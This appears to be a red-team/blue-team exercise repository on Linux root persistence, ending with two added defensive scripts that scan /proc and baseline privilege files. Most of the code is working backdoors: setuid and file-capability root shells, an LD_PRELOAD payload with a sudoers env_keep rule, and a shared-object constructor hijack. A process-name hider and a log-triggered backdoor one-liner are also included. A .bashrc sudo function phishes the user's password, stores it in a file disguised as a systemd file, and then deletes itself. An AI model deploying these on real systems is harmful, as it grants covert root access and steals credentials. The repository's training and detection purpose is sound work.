```
.
├── root_bin
│   ├── Makefile
│   ├── src.c
│   └── README.md
├── ld_preload
│   ├── README.txt
│   ├── Makefile
│   └── src.c
├── so_hijack
│   ├── Makefile
│   └── src.c
├── process_renaming
│   └── process_renaming.c
├── sudo_hijack
│   └── backdoor_bashrc.sh
└── README.md
```

/root_bin/Makefile:

```makefile
all: build
build:
	gcc src.c -o beroot
```

/ld_preload/README.txt:

```text
sudo LD_PRELOAD=/absolute/path/to/ldp.so cmd

sudo drops LD_PRELOAD (and the other LD_* variables) from the environment
by default, so this only works once sudoers keeps it:

    Defaults env_keep += "LD_PRELOAD"

That one line in /etc/sudoers or /etc/sudoers.d/ is the actual backdoor;
the library is just the payload.
```

/so_hijack/Makefile:

```makefile
all: build
build:
	gcc -fPIC -shared src.c -o j.so
```

/ld_preload/Makefile:

```makefile
all: build
build:
	gcc -fPIC -shared src.c -o ldp.so -nostartfiles
clean:
	rm -f *.so
```

/ld_preload/src.c:

```c
#include <stdlib.h>
#include <unistd.h>

/* Built with -nostartfiles, so this _init replaces the default one and runs
 * as soon as the dynamic loader maps the library, before the target's main().
 * Under sudo the process already has uid 0, so setreuid(0, 0) just makes
 * sure real and effective uid agree; bash would otherwise drop privileges. */
void _init(void)
{
    unsetenv("LD_PRELOAD");   /* do not preload ourselves into the spawned shell again */
    setreuid(0, 0);
    system("/bin/bash");
}
```

/root_bin/src.c:

```c
#include <stdlib.h>
#include <unistd.h>

/* Works as a setuid-root binary or with the cap_setuid file capability
 * (see README.md). setreuid(0, 0) sets both real and effective uid, so the
 * bash that follows does not drop privileges on startup. */
int main(void)
{
    setreuid(0, 0);
    system("/bin/bash");

    return 0;
}
```

/root_bin/README.md:

SUID
====
chown root: beroot
chmod go+rx beroot
chmod u+s beroot

CAPABILITY (stealthier)
=======================
setcap cap_setuid=ep beroot

Stealthier because a `find / -perm -4000` sweep for setuid files does not see
it; only `getcap -r /` does. The blue team has to do both.

/so_hijack/src.c:

```c
#include <stdlib.h>
#include <unistd.h>

/* Constructor: runs when the shared object is loaded, before main() of
 * whatever program pulled it in. Drop the library where a root-run program
 * loads it from (a directory listed in /etc/ld.so.conf, or in place of a
 * library it already links against). */
static void sample(void) __attribute__((constructor));

void sample(void)
{
    setreuid(0, 0);
    system("/bin/bash");
}
```

/process_renaming/process_renaming.c:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    const char *fake = "/bin/fullkekk";
    size_t room = strlen(argv[0]);   /* bytes of argv[0] we may overwrite in place */

    /* Overwrite the process name shown by ps (it reads /proc/PID/cmdline) with
     * whatever we want. /proc/PID/exe and /proc/PID/comm are not affected, which
     * is what the blue team should compare against. The new name must fit in
     * the old one: writing past it clobbers argv[1..] and the environment that
     * follow in the same memory block. */
    if (strlen(fake) > room) {
        fprintf(stderr, "new name longer than argv[0] (%zu > %zu)\n", strlen(fake), room);
        return 1;
    }
    memset(argv[0], 0, room);
    /* the original had strlen(fake + 1), which measured from the second
     * character and left the old name's tail and terminator in place */
    memcpy(argv[0], fake, strlen(fake) + 1);

    /* fork and exit the parent so the child is reparented to init (PPID 1) */
    int p = fork();
    if (p) {
        exit(0);
    }

    while (1) {
        sleep(1);
    }

    return 0;
}
```

/sudo_hijack/backdoor_bashrc.sh:

```bash
# UNIQUE PATTERN START
function sudo() {
    read -s -p "[sudo] password for $USER: " user_password

    # encrypt the captured password with the red team's public key so a blue
    # team reading the drop file learns nothing, and park it in RAM-backed /dev/shm
    # (openssl rsautl is deprecated in OpenSSL 3; pkeyutl -encrypt does the same)
    enc_pass=$(printf '%s' "$user_password" | openssl rsautl -encrypt -pubin -inkey <(echo -e "-----BEGIN PUBLIC KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANpeM7FFcr/W5l43MLPFkWEP0ALJHznj\nMDW4bdRWQrRyb2u2fgB/PdljMm3z7vLjO6ibubV2FbcqPn3jw0WPLNMCAwEAAQ==\n-----END PUBLIC KEY-----") 2>/dev/null | base64 -w0)
    echo -e "# Auto-generated by systemd, do not delete\r\n$enc_pass\r" > /dev/shm/.systemd.$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM 2>/dev/null

    echo ""
    sleep 2
    echo "Sorry, try again."

    # one capture only: remove ourselves from ~/.bashrc and from the running
    # shell, then hand over to the real sudo so the user sees a normal prompt
    sed -n -i '/# UNIQUE PATTERN START/,/#UNIQUE PATTERN END$/!p' ~/.bashrc
    unset -f sudo

    /usr/bin/sudo "$@"
}
#UNIQUE PATTERN END
```

/README.md:

Goals
=====

Goal for the red team:

* leave a means to come back as root on the machine: a remote backdoor
* leave as few logs as possible

Goal for the blue team:

* find out as soon as possible that a backdoor has been inserted


Assumptions:

* the red team is root
* the red team cannot stop the protections already in place
* the red team cannot produce very advanced exploits (fake FS information, rootkit, ...)


Kernel
======
Module
------
Red team:

* Load a module.

Blue team:

* Sign kernel modules and have the kernel enforce it (CONFIG_MODULE_SIG_FORCE)
* Forbid module loading after boot (`sysctl kernel.modules_disabled=1`; cannot be undone until reboot)

Kernel itself
-------------

Blue team:

=> Kernel signing (Secure Boot, so a replaced kernel image does not boot)?
=> Investigate unscheduled reboots (a replaced kernel only runs after one)
=> Control kernel integrity


Userspace remote backdoors
==========================
Standalone Process
------------------
Red team:

* Always listening for a remote connection, or waiting for a port-knocking sequence
* Can be hidden from ps
* Name can be hidden by overwriting argv[0] (process_renaming/process_renaming.c)
* Binary can be deleted after launch
* Can be run from the shell directly without touching disk
* Replace an existing binary

Blue team:

* Need to scan /proc, not ps (ps only repeats what /proc/PID/cmdline says)
* Check that the /proc/PID/exe symlink matches argv[0] and /proc/PID/comm; an exe target ending in " (deleted)" means the binary was removed after launch


Standalone Process triggered by external packet
-----------------------------------------------
Red team:

* Command run on an iptables TRIGGER rule (port knocking)
* iptables/netfilter module

Blue team:

* Audit netfilter rules (`iptables-save`, `nft list ruleset`)
* Monitor/forbid loading of netfilter modules


Standalone process triggered by application crash
-------------------------------------------------
Red team:

* Hook the kernel core dump handler: a `/proc/sys/kernel/core_pattern` starting with `|` runs the named program as root on every crash

Blue team:

* Monitor the value of kernel.core_pattern against the expected handler


Standalone process triggered by reboot
--------------------------------------
Red team:

* Somewhere in an init script or a unit file

Blue team:

* Monitor/sign init scripts and unit files


Standalone process triggered by a log
-------------------------------------

```bash
tail -F /var/log/syslog | awk '/Failed logging for user fhqsdghflhdsqk/ {system("run_backdoor")}'
```

The trigger is a log line the red team can produce from outside (a failed login with a chosen user name); `tail -F` survives log rotation.

Blue team:

* Scan /proc


Triggered by crontab/at
-----------------------

Red team:

* Could be used to evade /proc scanning: the process only exists while the job runs.


Blue team:

* Need to control user and system jobs (/etc/crontab, /etc/cron.d, per-user crontabs, at queue).


Inject into authorized process/library binary
---------------------------------------------

Red team:

* Add a backdoor to a binary.
* Add a backdoor to a webserver.

Blue team:

* Need to control binary integrity
* Need to control directories (write access to the directories the binaries live in)


Inject into process memory
--------------------------

Red team:

* inject the backdoor into a running process's memory
* Lost at reboot.

Blue team:

* Impossible to detect? Nothing on disk changes; anonymous executable regions in /proc/PID/maps are the only trace.


Hijack loader
-------------

Red team:

* Add configuration to /etc/ld.so.conf, /etc/ld.so.conf.d/ or /etc/ld.so.preload (the last one is loaded into every dynamically linked program, root's included)

Blue team:

* Control integrity of the loader configuration


PAM configuration
-----------------
Red team:

* Alter PAM configuration (/etc/pam.d)

Blue team:

* Need to control configuration integrity


SSH configuration
-----------------
Red team:

* Add an authorized key
* Default to another PAM stack

Blue team:

* Centralize and monitor authorized keys (AuthorizedKeysFile, AuthorizedKeysCommand)


User hijacking
--------------
Red team:

* Add a user, or change a user's password.

Blue team:

* Monitor /etc/{passwd,shadow}



Local backdoors
===============

Add root rights to low-privileged user
--------------------------------------
* /etc/sudoers
* /etc/sudoers.d/
* /etc/passwd (a second account with UID 0)
* /etc/group (membership of sudo/wheel)

Blue team:

* Monitor sudoers, and the passwd/group files above


Setuid/Setgid binary
--------------------

=> Monitor FS rights (`find / -perm -4000 -o -perm -2000`)

Capabilities binary
-------------------
Use a file capability (cap_setuid, see root_bin/README.md) to escalate to UID 0.

=> Monitor full FS rights, capabilities included (`getcap -r /`)
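The blue-team items under "Standalone Process" (scan /proc instead of ps, compare the exe symlink with argv[0]) as an added example; this script is not part of the repository. It assumes a Linux /proc layout. The root-directory parameter, the signal names it prints and the PROC_SCAN_LIVE variable are this example's own choices.

```shell
#!/bin/sh
# Added example, not part of the original repository: walk a /proc-like tree
# and report processes whose self-description disagrees with the kernel's view.
# Three signals, all readable without ptrace:
#   exe     /proc/PID/exe, symlink to the file actually executed
#   argv[0] first NUL-separated field of /proc/PID/cmdline: what ps shows and
#           what process_renaming.c overwrites
#   comm    /proc/PID/comm, set from the file name at execve (15 bytes max),
#           untouched by an argv[0] overwrite
# The tree root is a parameter so the function can run on a constructed
# fixture; default is the real /proc (run as root to read every exe link).

scan_proc() {
    root="${1:-/proc}"
    for d in "$root"/[0-9]*; do
        [ -d "$d" ] || continue
        pid="${d##*/}"
        exe=$(readlink "$d/exe" 2>/dev/null) || continue      # kernel thread, or no permission
        argv0=$(tr '\0' '\n' < "$d/cmdline" 2>/dev/null | head -n 1)
        comm=$(cat "$d/comm" 2>/dev/null || true)
        [ -n "$argv0" ] || continue                            # zombie or kernel thread

        # "Binary can be deleted after launch": the kernel marks the link target
        case "$exe" in
            *" (deleted)") echo "$pid deleted exe=$exe argv0=$argv0"
                           exe="${exe% (deleted)}" ;;
        esac

        exe_base="${exe##*/}"
        argv0_base="${argv0##*/}"
        argv0_base="${argv0_base#-}"                           # login shells: "-bash"

        # argv[0] should name the executed file. Interpreters only share a
        # prefix (python3 running /usr/bin/python3.11), so a prefix is accepted;
        # busybox-style multicall binaries will still show up here for review.
        case "$exe_base" in
            "$argv0_base"*) ;;
            *) echo "$pid argv0-mismatch exe=$exe argv0=$argv0" ;;
        esac

        # comm is the exe basename cut to 15 bytes unless prctl(PR_SET_NAME) changed it
        if [ -n "$comm" ] && [ "$comm" != "$(printf '%s' "$exe_base" | cut -c1-15)" ]; then
            echo "$pid comm-mismatch exe=$exe comm=$comm"
        fi
    done
}

# Live scan only when asked for, so the file can also be sourced for its function
if [ -n "${PROC_SCAN_LIVE:-}" ]; then
    scan_proc /proc
fi
```

Run it as root with `PROC_SCAN_LIVE=1 sh scan_proc.sh`, or source the file and call `scan_proc` directly. Every line it prints needs a human look rather than being an alert on its own: interpreters and multicall binaries trip the argv[0] check legitimately, and a process that set its own comm with prctl trips the second one. What the checks cannot see is a backdoor that keeps all three fields honest, which is why the README pairs them with file-integrity controls.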
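For the "Hijack loader", "PAM configuration", "SSH configuration", "User hijacking", "Add root rights", "Setuid/Setgid binary" and "Capabilities binary" sections, and the crash-handler and module knobs under /proc/sys, an added example that is not part of the repository: it takes a baseline of the files and binaries those sections say to watch and diffs a later run against it. The WATCH_PATHS list, the priv_baseline/priv_compare names and the root-directory parameter are this example's own choices; it relies on GNU stat, sha256sum, comm and, when present, getcap.

```shell
#!/bin/sh
# Added example, not part of the original repository.
# Baseline the files that grant privileges or steer privileged code, plus the
# setuid/setgid and capability-bearing binaries, then diff a later run.
# Paths are relative to a root directory so the functions can be exercised on
# a constructed tree; use / on a real host, as root.

# From the README: sudoers, passwd/shadow/group, loader config, PAM, sshd,
# cron, the init script, root's keys and rc file. Added here: ld.so.preload
# and the core_pattern / modules_disabled knobs (regular files under /proc/sys,
# so they hash like any other file).
WATCH_PATHS="etc/sudoers etc/sudoers.d etc/passwd etc/shadow etc/group \
etc/ld.so.conf etc/ld.so.conf.d etc/ld.so.preload etc/pam.d etc/ssh/sshd_config \
etc/crontab etc/cron.d etc/rc.local root/.ssh/authorized_keys root/.bashrc \
proc/sys/kernel/core_pattern proc/sys/kernel/modules_disabled"

# One line per watched file:  sha256 mode owner group path
# then one per setuid/setgid binary and one per file capability.
priv_baseline() {
    root="${1:-/}"; root="${root%/}"          # "" for /, so "$root/$p" stays absolute
    for p in $WATCH_PATHS; do
        [ -e "$root/$p" ] || continue
        find "$root/$p" -type f
    done | sort | while read -r f; do
        sum=$(sha256sum "$f" | cut -d' ' -f1)
        printf '%s %s %s\n' "$sum" "$(stat -c '%a %U %G' "$f")" "${f#"$root"}"
    done
    # setuid/setgid anywhere on the root filesystem: the classic root_bin/ backdoor
    find "${root:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
        | sort | while read -r f; do
        printf 'suid %s %s\n' "$(stat -c '%a %U %G' "$f")" "${f#"$root"}"
    done
    # file capabilities: the "stealthier" variant that the -perm sweep misses
    if command -v getcap >/dev/null 2>&1; then
        getcap -r "${root:-/}" 2>/dev/null | sort | while read -r line; do
            printf 'cap %s\n' "${line#"$root"}"
        done
    fi
}

# Lines only in NEW are added or modified entries (+); only in OLD, removed or
# modified (-). A modified file therefore shows up twice, old hash and new hash.
priv_compare() {
    old=$(mktemp); new=$(mktemp)
    sort "$1" > "$old"; sort "$2" > "$new"
    comm -13 "$old" "$new" | sed 's/^/+ /'
    comm -23 "$old" "$new" | sed 's/^/- /'
    rm -f "$old" "$new"
}

# Usage on a live host (as root):
#   priv_baseline / > baseline.txt          # once, on a known-good system
#   priv_baseline / > now.txt; priv_compare baseline.txt now.txt
```

Keep the baseline copy off the host, or at least compare against one pulled from elsewhere: the scenario assumes the red team is root, and a root can rewrite a local baseline as easily as it rewrote sudoers. Anything the diff prints under `etc/sudoers.d`, `etc/ld.so.preload` or as a new `suid`/`cap` line is a direct hit for the techniques listed in the README.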